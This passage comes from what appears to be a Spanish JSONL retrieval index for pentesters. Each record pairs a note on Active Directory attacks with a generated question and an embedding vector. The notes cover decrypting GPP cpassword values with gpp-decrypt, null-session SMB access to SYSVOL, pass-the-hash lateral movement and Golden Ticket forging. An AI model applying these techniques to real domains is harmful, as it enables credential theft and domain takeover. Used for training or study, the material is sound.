0.03891, 0.02082, 0.09649, -0.08976, 0.05223, 0.04682, 0.05649, -0.06024, -0.01897, 0.05174, 0.02134, 0.05132, -0.02135, 0.01597, 0.08513, 0.06829, -0.06756, -0.08177, 0.02164, -0.00013, 0.02464, -0.03183, -0.03726, -0.00634, -0.06379, -0.0008, 0.03968, -0.02121, -0.00188, -0.05834, 0.043, 0.04656, -0.05984, 0.02321, -0.06139, 0.00137, -0.02115, 0.01917, -0.02507, 0.03859, -0.04929, -0.02174, -0.08209, 0.05169, -0.02198, 0.12414, -0.00165, 0.00402, -0.06231, -0.04194, -0.04082, -0.04189, 0.02797, -0.02197, 0.13432, -0.02847, 0.04431, -0.06216, -0.07908, -0.08114, 0.06441, 0.04568, 0.05003, -0.03224, 0.04066, 0.07281, 0.01608, 0.05118, -0.058, -0.06847, -0.02188, 0.02048, -0.01779, 0.02196, -0.09814, 0.01618, -0.04557, 0.01767, -0.07, 0.05211, -0.0199, 0.02272, 0.02253, -0.0236, 0.00343, -0.00836, -0.06591, 0.01053, 0.02975, 0.01787, -0.03574, -0.04479, 0.04129, -0.03528, 0.02312, -0.00021, 0.03112, 0.00703, -0.01893, -0.01556, -0.03158, -0.01486, -0.03315, -0.10981, -0.01764, 0.03665, 0.01997, -0.012, -0.03213, 0.02188, 0.01577, 0.0771, -0.03224, 0.08202, -0.06356, -0.0942, -0.02392, 0.02158, -0.02837, 0.01999, 0.0007, -0.01913, 0.04059, 0.12917, -0.01169, 0.01719, 0.02436, 0.06537, 0.1133, -0.02407, -0.01832, 0.0303, 0.06413, -0.03123, -0.02792, 0.10189, 0.01318, 0.00303, -0.02761, 0.00988, -0.01538, 0.0396, 0.01464, -0.02413, -0.01742, -0.00826, -0.03466, -0.08247, -0.01734, -0.03387, -0.04251, -0.03876, 0.02624, 0.0116, -0.03703, 0.04188, -0.03456]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Descifrar\n```bash\ngpp-decrypt 'CPASSWORD_AQUI'\n```\n- Accedes a SYSVOL vΓ­a SMB (a menudo con sesiΓ³n nula o cualquier user de dominio).", "indexar": "que herramienta sirve para acceder al directorio SYSVOL mediante SMB?", "v": [-0.04721, -0.08757, -0.28477, -0.10946, 0.04866, -0.18558, -0.17074, -0.20258, -0.02446, 0.05332, -0.10037, 0.00679, 0.11154, -0.2465, 0.04027, 0.10618, 0.05937, -0.20498, -0.20251, 0.07851, 0.1142, 0.03693, -0.05223, -0.01449, -0.04556, 0.07067, 0.00397, -0.03746, -0.11167, -0.00427, 0.00524, -0.01165, 0.05925, -0.1245, -0.04726, -0.14919, -0.08367, 0.0679, -0.01265, 0.04025, 0.01657, -0.02259, -0.04312, 0.03768, -0.0074, -0.04005, 0.0007, 0.07368, -0.02217, 0.13574, -0.01143, -0.08967, -0.15521, 0.01827, -0.06516, -0.07012, 0.16809, -0.11442, -0.01889, -0.04858, -0.11437, -0.02221, -0.02683, -0.00672, 0.00211, -0.07859, 0.03982, -0.0565, -0.07623, 0.02944, -0.1156, 0.04912, 0.06791, -0.0104, -0.05044, 0.01104, -0.02754, 0.09565, 0.02973, -0.04978, 0.02419, -0.06615, -0.04922, 0.00494, -0.04758, -0.07492, 0.07084, -0.02848, 0.04083, -0.13434, 0.0072, 0.12048, 0.0024, 0.07435, 0.00688, -0.0183, -0.01226, -0.04644, 0.08358, -0.0023, 0.13022, -0.05395, -0.04189, 0.08009, -0.02606, 0.04527, -0.01931, -0.02, 0.0053, 0.06681, 0.06778, 0.04466, 0.02448, -0.04077, -0.00262, 0.00789, -0.07537, -0.04912, -0.00584, -0.03934, -0.01266, -0.02413, -0.0496, -0.00199, -0.08772, -0.00181, 0.03195, 0.03138, -0.05288, -0.02244, 0.02791, -0.01402, -0.01286, 0.0234, 0.01583, -0.0529, 0.00982, -0.13213, 0.00892, -0.06514, -0.01305, 0.00965, -0.00503, -0.07514, 0.00754, -0.04176, 0.00494, -0.03201, 0.00599, -0.00973, 0.06645, -0.02123, -0.02278, 0.03279, 0.00544, 0.03058, -0.00654, -0.01516, -0.08463, 0.02705, -0.06258, -0.03977, 0.04412, 0.04022, -0.03483, -0.05817, 0.02059, -0.02611, 0.06814, 0.05144, -0.00916, 0.02346, 0.05822, -0.05681, -0.02125, -0.09841, -0.0309, -0.00491, 0.02303, -0.01294, -0.01511, -0.03086, -0.04378, -0.00347, -0.03844, -0.07482, 0.02322, 0.00021, 0.00827, 0.02243, 0.00776, 0.05536, 0.01752, -0.03361, 0.01669, 0.00529, -0.03321, -0.00912, 0.04409, 0.01643, -0.04294, 0.04191, -0.08716, -0.02069, 0.06624, 0.06819, 0.02469, 0.02114, 0.02261, -0.00517, 0.07107, 0.01307, 0.02754, -0.00939, 0.00069, -0.04524, 0.04114, 0.04985, 0.02696, 0.02098, -0.00774, -0.02319, 0.06298, 0.00873, -0.0238, -0.01097, 0.00242, 0.00371, 0.00792, -0.00407, 0.01436, 0.01044, 0.00743, -0.01201, 0.05007, -0.01156, -0.02078, -0.00131, -0.02725, 0.03, -0.05966, 0.02099, -0.02435, 0.00167, -0.04822, -0.03918, -0.00098, -0.08455, -0.03306, -0.02328, 0.00711, -0.00647, 0.01434, -0.02279, 0.015, -0.00906]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Descifrar\n```bash\ngpp-decrypt 'CPASSWORD_AQUI'\n```\n- Accedes a SYSVOL vΓ­a SMB (a menudo con sesiΓ³n nula o cualquier user de dominio).", "indexar": "cΓ³mo descifro el contenido del archivo CPASSWORD_AQUI?", "v": [-0.20297, -0.19015, 0.13152, -0.03615, 0.00116, -0.12893, 0.15687, -0.06687, -0.15387, -0.0088, -0.08767, -0.10852, -0.04679, 0.00425, 0.1214, -0.10041, 0.13776, -0.0549, 0.01051, 0.18542, 0.01426, -0.0453, -0.05507, 0.01771, 0.02201, -0.02497, 0.15397, 0.04894, -0.17048, -0.03395, 0.02237, -0.00661, 0.15194, 0.16133, 0.05683, 0.09073, 0.01214, 0.08689, -0.16848, 0.10965, -0.04138, 0.00665, -0.10738, 0.02928, 0.04433, -0.08839, -0.02031, 0.00724, 0.03299, 0.07813, 0.05313, -0.0517, -0.07681, -0.00663, -0.09627, -0.02146, 0.02677, -0.06614, 0.00038, -0.0081, -0.00618, 0.07862, -0.02066, 0.04317, 0.00631, -0.12998, 0.00822, 0.13091, -0.03311, 0.05136, -0.05974, -0.0123, 0.01278, -0.05294, -0.00364, 0.02862, -0.04418, -0.0188, -0.01711, 0.02968, 0.02257, -0.02539, 0.06516, -0.02413, -0.06804, -0.02956, 0.05916, -0.00103, -0.00209, -0.05372, 0.06405, 0.03534, 0.022, 0.0689, 0.02994, -0.11024, 0.00725, -0.0037, 0.04256, 0.02736, -0.03762, 0.07198, -0.04153, 0.11247, 0.07734, 0.13014, 0.07117, -0.01404, -0.03141, -0.08462, 0.07183, 0.00922, 0.05931, 0.0311, -0.0528, -0.0616, -0.00821, -0.10532, 0.11808, 0.01362, -0.01297, 0.0515, -0.04213, -0.02606, -0.05017, -0.01856, 0.0671, 0.08246, -0.07219, 0.00919, -0.05905, 0.04195, -0.07937, -0.01405, 0.0238, -0.07813, -0.01942, 0.01292, -0.0223, -0.0454, 0.0499, -0.06174, -0.05752, 0.08814, 0.05831, -0.01114, 0.05375, 0.01725, -0.10853, 0.00968, 0.03741, -0.02005, 0.01292, -0.04011, -0.02119, 0.0511, 0.07691, -0.08181, -0.06369, 0.01653, -0.03863, 0.02345, -0.03529, -0.01638, 0.02311, 0.00223, -0.01466, 0.03735, -0.006, -0.1019, 0.0027, 0.00747, -0.04524, -0.02589, -0.03641, -0.08, -0.0107, -0.02416, 0.04265, -0.02479, -0.05916, -0.01591, 0.03348, 0.06454, -0.05237, -0.07674, 0.01582, -0.02299, -0.03252, 0.01319, -0.00969, 0.06496, -0.02073, 0.00042, -0.03296, 0.01028, -0.06866, 0.026, 0.0237, 0.04944, -0.02704, -0.04097, 0.02455, -0.01925, 0.00194, 0.0046, -0.04775, 0.01435, -0.07343, 0.02735, 0.01, -0.00094, 0.04793, -0.05763, -0.0595, 0.00737, 0.02853, -0.02988, -0.04428, 0.00649, -0.00437, 0.0609, 0.12539, -0.02039, 0.04585, 0.05154, -0.00273, 0.07952, 0.01571, 0.01443, 0.00861, 0.11639, -0.07124, 0.03994, 0.13883, -0.00776, 0.0081, -0.00229, -0.06259, -0.03905, 0.05151, 0.06054, -0.02698, -0.04223, -0.0169, -0.05327, -0.00948, 0.02639, 0.03524, -0.02111, 0.01586, -0.05803, 0.03956, -0.02387, 0.04652, -0.08674]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Descifrar\n```bash\ngpp-decrypt 'CPASSWORD_AQUI'\n```\n- Accedes a SYSVOL vΓ­a SMB (a menudo con sesiΓ³n nula o cualquier user de dominio).", "indexar": "con quΓ© programa puedo entrar a un servidor usando sesiΓ³n nula?", "v": [-0.07102, 0.11499, -0.21045, -0.13604, -0.06465, -0.10868, -0.07462, -0.15468, -0.0249, -0.04342, -0.20398, -0.04193, -0.00751, -0.08666, -0.10344, 0.04873, 0.13813, -0.06932, 0.09142, 0.0637, -0.0114, 0.05572, 0.03726, -0.07908, -0.03113, 0.09076, 0.11935, -0.04414, 0.05394, -0.14872, -0.02817, -0.13705, 0.15062, -0.12609, 0.04654, -0.03164, 0.03449, 0.08266, -0.01038, 0.05992, 0.04854, 0.11715, -0.04625, 0.02126, 0.12575, -0.05075, 0.08571, -0.04012, 0.01055, -0.06936, -0.04286, -0.06198, -0.06651, -0.00303, -0.02279, -0.03675, 0.0581, -0.18284, 0.04557, -0.03047, -0.11818, 0.07044, -0.0007, -0.05534, 0.08321, -0.04115, 0.05183, -0.01326, -0.04633, 0.02313, -0.10022, -0.01299, 0.00618, -0.10247, 0.12068, 0.05757, -0.00822, -0.06486, 0.04031, 0.01381, -0.03428, -0.01197, 0.0351, 0.08451, -0.13479, 0.01441, 0.00921, -0.00867, -0.00254, 0.02764, 0.04033, 0.07698, -0.03781, 0.02618, 0.07674, -0.00959, 0.14337, 0.04031, 0.01008, 0.0432, 0.10687, 0.04434, -0.11111, 0.14582, -0.01963, 0.08082, 0.09963, -0.086, -0.008, 0.00602, 0.04424, -0.01815, -0.08149, -0.08346, -0.06492, 0.02191, -0.02128, -0.03202, 0.00785, 0.02437, -0.10886, 0.01989, -0.02258, 0.05969, 0.04262, -0.0535, 0.05427, 0.10411, -0.07205, 0.01725, -0.01013, -0.00187, -0.03166, -0.01066, -0.04018, -0.00579, 0.05768, -0.07122, -0.08595, -0.05118, 0.0192, 0.0794, 0.04089, 0.03037, 0.07697, -0.02369, 0.07963, -0.121, -0.07085, 0.05865, 0.04439, -0.03505, -0.03073, 0.07036, -0.12499, -0.01237, 0.03123, -0.10366, -0.03809, 0.04716, -0.02334, 0.04626, -0.01815, 0.03132, 0.01694, -0.05392, -0.03949, 0.04401, 0.0459, 0.0992, -0.02175, 0.02512, 0.0053, -0.04513, 0.03601, 0.03808, -0.06214, -0.04828, 0.0314, -0.0255, -0.06309, 0.00825, -0.01675, -0.00459, -0.06633, -0.02968, -0.05513, 0.01417, 0.05865, 0.01811, -0.0135, 0.05469, -0.07137, 0.01888, 0.00794, -0.04279, -0.01213, -0.04336, 0.00272, -0.01351, -0.00383, 0.01582, 0.0232, -0.01612, 0.04893, 0.01358, -0.05059, 0.02554, 0.03178, 0.06152, -0.04444, -0.04173, 0.07509, 0.00032, -0.02967, 0.03924, 0.0278, 0.00328, 0.01748, -0.03992, 0.02039, 0.02636, 0.0292, 0.05145, 0.01548, -0.01119, 0.00262, 0.01472, 0.04276, 0.02712, -0.02666, -0.01777, -0.06872, -0.00877, 0.03993, 0.00278, 0.00132, -0.01492, -0.03435, -0.07577, 0.00032, 0.10344, -0.03297, -0.07019, 0.01682, -0.01803, -0.04673, -0.01354, -0.0266, 0.00082, -0.0221, 0.0228, 0.04388, -0.05162, 0.05122, 0.00457]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nCredenciales en claro β†’ Movimiento lateral / Pass-the-Hash.\n\nRelacionado: SMB Β· OSCP MOC", "indexar": "ΒΏquΓ© herramientas sirven para hacer movimiento lateral con credenciales en claro?", "v": [-0.14118, 0.05942, -0.10355, -0.11407, -0.10722, -0.165, -0.08669, 0.12339, 0.02, -0.13398, -0.09521, 0.00601, -0.05614, -0.06708, 0.14433, 0.12337, 0.03362, -0.00288, 0.04078, -0.02895, -0.13802, -0.05026, -0.0458, -0.09807, -0.00721, -0.04112, 0.05855, -0.00961, -0.15925, 0.06713, -0.07764, 0.08523, 0.06008, -0.01493, 0.03858, -0.03839, -0.06397, 0.10931, 0.01908, 0.14622, -0.11083, -0.01088, -0.06229, -0.03568, 0.02869, 0.03048, -0.06739, 0.03956, -0.12705, 0.07928, 0.02742, -0.02964, -0.00987, -0.11628, -0.02876, -0.07201, 0.16398, -0.09391, -0.00897, -0.17127, -0.03998, 0.02322, -0.02556, 0.04044, -0.03695, -0.09528, -0.0405, -0.12573, -0.05782, 0.01954, -0.03879, -0.01927, -0.02099, 0.11368, -0.09065, 0.04323, 0.0303, -0.00423, 0.02679, 0.07574, 0.02262, 0.11661, -0.04117, -0.03877, 0.03727, -0.04957, -0.02026, -0.00932, 0.02934, 0.01901, 0.08098, 0.1717, -0.06577, 0.04259, 0.0003, 0.12034, -0.13308, -0.03092, -0.07911, -0.03136, 0.09252, -0.08134, -0.0587, -0.05165, -0.026, -0.05926, 0.03885, 0.02987, -0.08482, 0.06272, 0.07843, 0.05086, -0.04621, 0.04957, 0.02937, 0.06626, -0.11192, -0.05805, -0.04967, 0.06459, 0.13922, -0.03551, -0.07092, -0.08902, -0.02477, -0.00359, -0.06727, 0.01371, -0.06288, -0.04527, 0.08134, -0.07055, -0.0498, -0.04874, -0.02089, -0.08401, 0.09878, -0.01338, 0.04063, -0.01754, 0.06792, -0.0204, -0.05939, -0.05843, 0.00926, 0.05652, 0.09669, -0.01526, 0.02297, -0.00627, -0.00607, 0.01787, 0.03077, -0.00448, 0.00776, -0.00519, -0.01447, -0.00581, -0.1519, -0.01733, -0.01412, 0.02507, -0.0062, -0.01845, -0.01823, -0.06845, 0.02837, 0.06735, 0.02261, 0.02385, 0.01818, 0.01331, 0.02821, -0.0025, 0.07489, 0.02753, -0.04505, -0.016, 0.0349, -0.00702, 0.06357, 0.03405, 0.00278, -0.0063, 0.13613, 0.01036, 0.06061, -0.01448, 0.0246, 0.11893, -0.05532, -0.0189, 0.00451, -0.05372, 0.03582, 0.02445, 0.0293, -0.01605, 0.01764, 0.04374, -0.05917, -0.04129, 0.04241, 0.01272, 0.03948, 0.06867, -0.02832, 0.03575, 0.03132, 0.02113, -0.02116, -0.0259, 0.13261, -0.00517, -0.07878, -0.00599, -0.07137, 0.03661, -0.04721, -0.0137, 0.02819, -0.02428, -0.00397, -0.00246, 0.03976, 0.02426, 0.01964, -0.01987, -0.05115, 0.01636, 0.07928, 0.01802, -0.02946, -0.00887, -0.01676, -0.04763, 0.06817, 0.01597, -0.05924, 0.01204, -0.04335, -0.0331, -0.00862, 0.0411, -0.0534, -0.01395, -0.00787, 0.02004, -0.01278, -0.0103, 0.01437, -0.03078, 0.01639, -0.01418, 0.07322, 0.01952]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nCredenciales en claro β†’ Movimiento lateral / Pass-the-Hash.\n\nRelacionado: SMB Β· OSCP MOC", "indexar": "con quΓ© programa puedo aprovechar el ataque de pass-the-hash?", "v": [-0.0381, 0.10247, -0.15299, -0.11332, -0.0401, -0.05507, 0.01681, 0.00361, -0.07552, 0.10009, -0.02135, -0.00831, -0.10353, 0.01414, 0.03125, 0.04799, 0.09188, 0.09815, 0.02089, 0.00113, -0.01324, 0.03019, -0.09855, -0.03491, -0.03201, 0.02076, -0.03767, 0.15051, -0.1931, -0.10816, -0.02204, -0.07581, -0.03242, -0.0235, 0.07413, 0.04343, 0.01109, 0.15922, 0.12788, 0.09359, 0.02858, 0.04669, -0.1722, 0.01639, 0.1231, -0.12156, 0.02176, 0.04452, 0.05017, -0.07756, 0.10014, 0.02896, -0.16172, -0.05349, 0.09204, -0.06305, -0.04592, -0.06449, -0.10373, 0.02727, -0.07487, 0.05159, 0.01218, -0.06151, 0.0569, -0.06971, 0.03869, 0.02133, -0.10167, 0.09736, -0.01, 0.06469, -0.00329, 0.04197, -0.01499, 0.03779, 0.00868, 0.03272, 0.04514, 0.00281, -0.02986, -0.02604, 0.00161, -0.0139, -0.1229, 0.00879, 0.07285, -0.07695, -0.02667, -0.01158, 0.01857, 0.03782, 0.07941, 0.00764, -0.01664, -0.07858, 0.03995, -0.06641, -0.01442, 0.02931, -0.0318, -0.08349, -0.15587, 0.16906, -0.02226, 0.05752, 0.03841, -0.02073, -0.02529, 0.00653, 0.0028, -0.09546, -0.07106, -0.07287, -0.02164, 0.00154, -0.09608, 0.01, -0.01689, 0.01255, -0.13532, 0.06647, 0.00387, 0.02098, 0.07519, 0.0058, -0.06711, 0.09257, -0.12932, 0.05425, -0.02401, 0.04638, -0.00431, 0.01649, -0.04471, -0.04266, 0.06665, -0.09419, -0.06585, -0.00047, 0.00628, 0.10917, 0.01395, 0.0707, 0.02513, -0.00472, -0.01164, -0.02942, -0.09501, 0.02125, 0.01405, -0.03729, 0.03576, 0.05701, -0.06892, -0.05586, 0.02463, -0.04381, -0.09652, 0.11177, -0.08772, 0.04263, -0.10781, 0.02853, 0.05139, -0.02334, 0.03691, -0.04853, 0.08876, 0.07355, 0.00932, 0.01358, 0.05742, -0.05657, 0.0056, -0.07273, -0.03709, -0.01716, 0.02877, -0.0719, -0.03669, -0.03711, -0.01852, 0.01637, -0.05777, -0.04792, -0.00757, 0.0857, 0.06846, 0.0208, -0.01446, 0.02809, -0.0313, 0.04533, -0.02023, -0.02368, -0.04855, 0.02555, 0.03507, -0.02814, -0.00445, 0.02239, 4e-05, -0.01835, 0.10796, 0.11497, -0.0811, -0.01478, 0.01678, 0.12762, 0.01041, -0.06873, 0.0905, -0.01532, -0.10771, 0.02356, 0.00076, 0.06176, 0.03602, 0.01333, 0.06994, 0.04777, 0.02907, 0.08437, -0.01098, -0.09895, -0.0432, -0.00153, 0.04107, 0.04153, -0.02607, -0.07381, 0.00485, -0.01892, -0.00256, -0.0632, -0.04692, -0.01332, -0.08994, -0.06474, -0.00505, 0.03592, -0.0028, -0.03384, -0.00664, 0.02186, -0.0566, 0.02668, -0.0002, -0.0131, -0.0451, 0.04958, 0.0025, -0.04323, 0.07383, 0.02622]} -{"tipo": "pregunta", "herramienta": "GPP cpassword", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/GPP cpassword.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\nCredenciales en claro β†’ Movimiento lateral / Pass-the-Hash.\n\nRelacionado: SMB Β· OSCP MOC", "indexar": "cual es una alternativa libre para realizar ataques de tipo pass-the-hash?", "v": [-0.04468, 0.03863, -0.20678, -0.01405, -0.08243, -0.06511, -0.00281, 0.01005, -0.08013, 0.11657, -0.01251, -0.14888, -0.03904, 0.04492, 0.15615, -0.02767, 0.06658, 0.00638, 0.10616, 0.00223, -0.083, 0.02122, -0.1087, -0.00494, -0.06869, -0.05782, -0.08332, 0.10832, -0.23328, -0.04826, 0.01599, -0.04663, -0.01854, 0.0374, 0.00418, 0.06195, 0.08262, 0.1584, 0.15638, 0.02139, 0.02173, 0.00054, -0.19431, 0.03895, 0.03715, -0.14955, -0.03181, 0.08121, 0.05836, -0.00477, 0.08018, 0.04613, -0.23056, -0.00929, 0.03962, -0.10093, 0.07585, -0.07933, -0.1029, -0.05163, -0.12043, 0.0968, 0.05226, -0.02675, 0.06579, -0.07079, -0.03858, -0.01815, -0.07834, 0.10045, 0.07542, 0.00671, -0.00846, 0.05658, -0.0758, 0.04141, -0.02524, 0.00828, 0.0442, 0.05733, 0.05243, -0.03708, -0.01953, 0.0198, -0.13632, -0.04836, 0.0621, -0.11605, 0.00503, 0.05739, 0.07727, 0.04111, 0.0444, 0.04616, -0.10267, -0.07642, -0.04738, -0.00321, -0.03958, -0.02871, 0.00373, 0.00195, -0.12019, 0.09064, -0.00511, -0.02011, -0.03306, 0.05076, -0.02625, -0.05298, 0.00167, -0.00904, 0.00816, -0.04529, 0.02136, -0.07723, -0.06211, 0.03382, 0.02885, 0.01588, -0.09952, 0.00181, -0.02528, -0.01346, 0.0473, 0.04065, 0.01176, -0.00373, -0.09861, -0.00212, 0.05041, 0.03308, -0.04686, -0.04485, -0.0869, 0.02885, 0.08773, -0.09454, 0.00608, -0.01644, 0.04141, 0.09679, -0.00821, 0.03541, 0.05524, -0.00558, -0.01492, -0.04384, -0.07105, -0.03652, -0.02564, 0.00414, 0.02766, 0.09971, -0.07962, -0.00169, -0.06169, -0.06856, -0.07753, 0.17407, -0.00227, 0.02087, -0.06368, 0.00962, -0.04182, -0.00617, 0.0274, -0.02972, -0.0152, -0.00203, 0.02047, 0.04289, 0.0632, -0.0868, 0.05138, -0.07004, -0.04651, -0.08988, 0.02195, -0.0781, 0.02276, -0.05513, -0.09085, 0.00275, -0.01707, -0.0843, 0.06826, 0.03151, 0.06476, 0.03836, -0.02233, 0.0063, -0.07239, 0.00042, -0.00392, 0.00628, -0.0172, -0.08005, -0.01157, -0.02322, 0.00215, -0.01718, -0.0368, -0.0592, 0.01857, 0.05065, -0.0575, -0.0317, 0.01971, 0.05989, 0.06405, -0.00263, 0.10358, -0.00633, -0.06247, 0.00391, 0.03021, -0.0084, -0.00586, -0.03046, 0.04798, 0.02798, 0.01623, 0.04136, -0.031, 0.01722, -0.01757, -0.01013, -0.00869, 0.02821, 0.03263, -0.02073, 0.00243, 0.01731, 0.0198, -0.02358, -0.00949, 0.01556, -0.03609, -0.0242, 0.04783, 0.02353, -0.00526, -0.01059, -0.02479, 0.0083, -0.12079, -0.00177, -0.03294, -0.04888, -0.03629, 0.06054, -0.0051, 0.04229, 0.02827, -0.00425]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Golden Ticket\n\n> Con el hash de **krbtgt** forjas tu propio TGT β†’ eres **cualquiera** (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.", "indexar": "que herramienta sirve para forjar un TGT con el hash de krbtgt?", "v": [0.01326, -0.14003, -0.11715, -0.07077, 0.11996, -0.18858, -0.10337, 0.17385, 0.09416, 0.0584, -0.09868, 0.02043, 0.09119, 0.04707, 0.08532, 0.10114, -0.06847, -0.09725, -0.07043, 0.06496, 0.02572, 0.01937, -0.02057, -0.00334, -0.13841, -0.05057, -0.03967, 0.04124, -0.31645, 0.12079, -0.00341, -0.07992, -0.11232, -0.00065, -0.13967, -0.00676, -0.02796, 0.16261, -0.06882, 0.10052, 0.06291, -0.06069, 0.01266, 0.15766, 0.00664, -0.00595, -0.05613, -0.03031, 0.01389, 0.09583, -0.05337, -0.09222, -0.18284, -0.01535, -0.02974, -0.08853, 0.09548, -0.12855, -0.07623, -0.09091, -0.10339, -0.05372, -0.1466, -0.09962, -0.01222, -0.11045, -0.03491, -0.04625, -0.06245, 0.03951, -0.07281, 0.08415, -0.05152, -0.02086, -0.02855, 0.0352, -0.02141, 0.0847, 0.06746, 0.01431, 0.02655, -0.06711, -0.0629, -0.00839, -0.11414, -0.08693, 0.12024, -0.03287, 0.02797, -0.0148, -0.00486, 0.1837, 0.05188, 0.04394, 0.02542, -0.06625, 0.08153, -0.01268, 0.01167, -0.00339, 0.06042, -0.04863, -0.07634, 0.08749, -0.03139, -0.06146, 0.02728, -0.00854, 0.00169, 0.04666, 0.10999, 0.0361, -0.01837, -0.0346, -0.00432, 0.02358, -0.04362, -0.08468, 0.02162, -0.01556, -0.00028, 0.0232, 0.02434, -0.04585, 0.06112, -0.02588, -0.07218, 0.03352, 0.00381, -0.03157, -0.02038, 0.04974, -0.04873, 0.06174, -0.02491, -0.0434, 0.08633, -0.03765, -0.04238, -0.02203, 0.01451, 0.06628, -0.01761, -0.14222, 0.01507, -0.0091, 0.01909, 0.01074, 0.04082, -0.02413, 0.04306, -0.067, 0.02828, -0.04058, 0.0187, -0.06099, -0.03579, 0.01749, -0.062, 0.01015, -0.00669, -0.05284, 0.02141, 0.03642, -0.00243, -0.0617, 0.02276, 0.01756, 0.07844, 0.01415, 0.09094, -0.02585, 0.06329, 0.00356, 0.03263, -0.04804, -0.06658, 0.01242, -0.04672, -0.06802, -0.01674, -0.0398, -0.03965, -0.03384, 0.04069, -0.00014, 0.04423, -0.01059, 0.05475, -0.012, -0.05822, 0.03137, -0.02445, -0.03358, 0.01045, 0.0272, 0.04895, -0.05913, 0.04824, -0.01331, -0.02739, -0.00929, 0.01035, -0.05684, -0.00897, 0.01747, 0.00534, 0.00529, -0.00441, -0.00061, 0.02601, 0.02037, 0.03215, 0.00199, -0.04302, 0.01834, -0.02186, 0.02163, -0.00015, 0.02295, 0.00237, -0.01916, -0.0074, -0.00926, -0.01907, 0.01428, 0.01629, -0.02922, 0.00668, 0.0109, -0.00276, -0.01851, 0.01622, 0.03638, -0.04518, -0.04865, -0.02127, 0.01963, -0.03498, -0.04903, -0.03016, 0.00213, -0.01628, 0.00865, 0.00718, -0.05115, -0.00107, -0.0181, 0.00921, -0.0639, -0.03574, -0.03169, 0.03472, -0.00676, 0.00506, -0.00203]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Golden Ticket.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Golden Ticket\n\n> Con el hash de **krbtgt** forjas tu propio TGT β†’ eres **cualquiera** (incluso un Domain Admin inexistente), para siempre. Cima de Active Directory.", "indexar": "como puedo montar un dominio admin inexistente usando krbtgt?", "v": [0.11818, 0.0014, -0.09695, 0.00442, -0.10155, -0.02959, 0.01472, 0.15157, -0.31152, -0.05224, -0.06556, -0.09487, 0.0154, -0.10302, 0.04239, 0.00478, 0.04719, -0.02681, -0.04146, -0.03229, -0.03498, -0.14701, 0.09163, 0.03928, -0.0261, 0.03478, -0.0461, -0.09457, -0.08542, 0.02535, 0.10113, 0.00536, 0.00439, 0.04524, -0.05941, -0.12606, -0.02623, 0.04469, -0.0126, 0.14306, 0.11258, -0.15855, -0.07818, 0.14867, -0.0838, 0.02351, -0.0461, -0.12942, -0.01466, 0.02112, -0.003, -0.04594, -0.16545, -0.03942, 0.02947, -0.04318, 0.06074, -0.18893, 0.06818, -0.02044, -0.04892, 0.01737, -0.05879, 0.04694, 0.0, -0.05917, -0.0682, -0.00336, -0.06437, -0.00716, -0.03966, -0.03124, -0.03451, -0.03775, 0.07808, 0.04794, 0.02785, 0.03256, 0.06395, -0.02152, -0.00217, -0.03087, -0.03352, -0.00337, -0.13447, -0.1753, 0.02133, -0.18031, -0.00277, 0.00553, 0.10101, 0.1046, -0.01947, -0.02041, -0.05261, -0.07705, 0.06208, 0.02288, 0.01679, 0.01887, -0.03566, 0.20793, -0.06011, 0.13033, 0.17725, 0.01201, 0.09226, -0.07127, 0.03869, -0.03903, 0.01856, -0.03608, -0.15327, -0.07027, -0.05009, -0.02574, -0.07716, -0.04398, 0.02281, -0.0204, -0.05543, 0.02789, 0.06611, -0.00706, 0.0518, -0.03772, 0.00308, 0.02019, 0.00138, -0.00149, -0.01624, 0.01625, 0.06917, -0.00544, -0.09237, 0.05083, 0.02454, 0.0603, -0.07665, -0.02758, -0.00892, 0.02377, -0.085, -0.11522, -0.01923, -0.00448, 0.0014, -0.10323, 0.05516, -0.00314, -0.07374, 0.06553, -0.00735, 0.07567, 0.03348, -0.03581, -0.03794, -0.00313, 0.05084, 0.02762, 0.00208, 0.05982, -0.01177, 0.07431, -0.02415, -0.04733, 0.01118, -0.02126, 0.02375, -0.0527, 0.04047, 0.06177, 0.01451, 0.04314, 0.02698, 0.04538, 0.00182, 0.01182, -0.0004, -0.04337, -0.04285, -0.05822, 0.00159, 0.03461, -0.01423, 0.05437, 0.05846, 0.03096, 0.00268, 0.00466, 0.01844, -0.00484, -0.01925, 0.04372, 0.00034, -0.02263, 0.01079, 0.00513, 0.02537, 0.0204, -0.01792, 0.02075, -0.00984, -0.02526, -0.01369, -0.07197, 0.01834, 0.05175, -0.04386, -0.0045, -0.01626, -0.07126, -0.02724, -0.04535, 0.00365, 0.03862, -0.01565, -0.00328, -0.04651, -0.02265, -0.08642, 0.05311, 0.03722, 0.00188, 0.05566, 0.02772, 0.00418, 0.00284, 0.03479, 0.05194, -0.0701, 0.0414, -0.00021, 0.00674, 0.04051, -0.0007, 0.03078, -0.00567, 0.01616, -0.00555, 0.00814, 0.01395, 0.02642, 0.0036, -0.04162, -0.0595, -0.05392, 0.05496, 0.01866, -0.03416, 0.0337, 0.02494, -0.02274, -0.00048, -0.01723, -0.02523]} -{"tipo": "pregunta", "herramienta": "Golden Ticket", "perfil": 